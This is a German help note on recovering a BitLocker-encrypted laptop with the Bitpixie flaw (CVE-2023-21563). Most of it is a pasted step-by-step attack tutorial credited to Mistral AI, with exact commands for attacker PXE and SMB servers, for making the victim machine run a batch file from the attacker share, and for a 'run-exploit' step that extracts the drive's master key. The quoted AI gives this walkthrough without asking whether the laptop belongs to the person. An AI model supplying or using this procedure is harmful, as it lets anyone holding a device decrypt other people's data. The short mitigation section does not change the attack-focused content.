bitlocker Laufwerk entschlüsseln

Problem:

Laptop hat eine Bitlocker Verschlüsselung, aber User hat keinen Zugriff mehr auf dieses Windows.

Lösungsansatz:

Der Bitpixie bug wurde von Rairii entdeckt und als CVE-2023-21563 definiert. Die erste öffentliche Umsetzung dieser „Attacke“ wurde von th0mas auf der 38c3 demonstriert.

Links:

Kurze Zusammenfassung – https://zendata.security/2025/05/15/bitlocker-bypassed-a-simple-key-extraction-is-enough-to-break-the-encryption

CCC -Artikel – https://media.ccc.de/v/38c3-windows-bitlocker-screwed-without-a-screwdriver

HowTo on github – https://github.com/andigandhi/bitpixie

Detailierter Artikel über Vorgangsweise https://neodyme.io/en/blog/bitlocker_screwed_without_a_screwdriver

Lösung per Mistral-KI:

Here’s a step-by-step tutorial for the Bitpixie Proof of Concept (PoC) attack, based on the provided documentation. This attack exploits a vulnerability in BitLocker (CVE-2023-21563) to extract the Volume Master Key (VMK) and decrypt the drive without pre-boot authentication.

1. General Concept

Goal: Extract the BitLocker VMK from memory by booting the target machine into a custom PXE environment.
Vulnerability: BitLocker’s reliance on unprotected boot configurations and the ability to modify the Boot Configuration Data (BCD) file.
Mitigations: Use BitLocker with Pre-Boot Authentication (TPM+PIN), apply patch KB5025885, or disable UEFI network stack.

2. Prerequisites for the Attack

Target Machine Requirements

BitLocker enabled without pre-boot authentication.
PXE boot not disabled in BIOS (or can be enabled via external network card).
PCR Validation does not include PCR4 (check with manage-bde -protectors -get c:).

Attacker Machine Requirements

Install required packages: sudo apt install dnsmasq libwin-hivex-perl python3-impacket
Clone the Bitpixie repository and build the initramfs: git clone --depth 1 https://github.com/andigandhi/bitpixie cd bitpixie ./build.sh

3. Step-by-Step Attack Process

Step 1: Start Attacker Servers

TFTP/DHCP Server (for PXE boot): ./start-server.sh pxe <interface>
SMB Server (for BCD file exchange): ./start-server.sh smb <interface>

Step 2: Extract the BCD File from the Victim

On the victim machine, boot into Advanced Boot Options (hold Shift while clicking Restart).
Open Command Prompt (Troubleshoot → Advanced Options → Command Prompt).
Run: wpeutil initializenetwork net use S: \\<attacker-ip>\smb cd %TEMP% copy S:\create-bcd.bat . .\create-bcd.bat This exports the BCD file to the attacker’s SMB share.

Step 3: Boot the Victim via PXE

In Advanced Boot Options, select Use a device → IPv4 PXE Boot.
The victim boots into the Alpine initramfs (custom PXE environment).

Step 4: Extract the VMK

Log in as root in the initramfs.
Run the exploit: run-exploit /dev/sda3
The BitLocker partition is mounted at /root/mnt. If it fails, reboot and retry.

Step 5: Access the Decrypted Drive

The VMK is extracted, and the drive is now accessible.
Unmount after use: umount /root/mnt

4. Mitigations

Enable Pre-Boot Authentication (TPM+PIN).
Apply patch KB5025885 (Microsoft’s fix).
Disable UEFI network stack (prevents PXE boot).

5. Testing the Exploit (QEMU)

Install Windows 11 in QEMU with BitLocker enabled.
Configure the network interface in VirtManager: <interface type="network"> <model type="virtio"/> <rom enabled="no"/> </interface>
Boot the VM via PXE and test the exploit.

6. Alternative BCD Extraction (Not Recommended)

Boot the victim into the Linux initramfs via PXE.
Run the BCD extractor script on the attacker machine: ./grab-bcd.sh /dev/sda
The modified BCD file is created in pxe-server/Boot/BCD.

Summary

This attack exploits BitLocker’s reliance on unprotected boot configurations. By modifying the BCD file and booting via PXE, the VMK can be extracted and the drive decrypted. Mitigations include enabling TPM+PIN, patching, or disabling PXE.

Question: Would you like a deeper dive into any specific step (e.g., building the initramfs, QEMU setup, or mitigations)?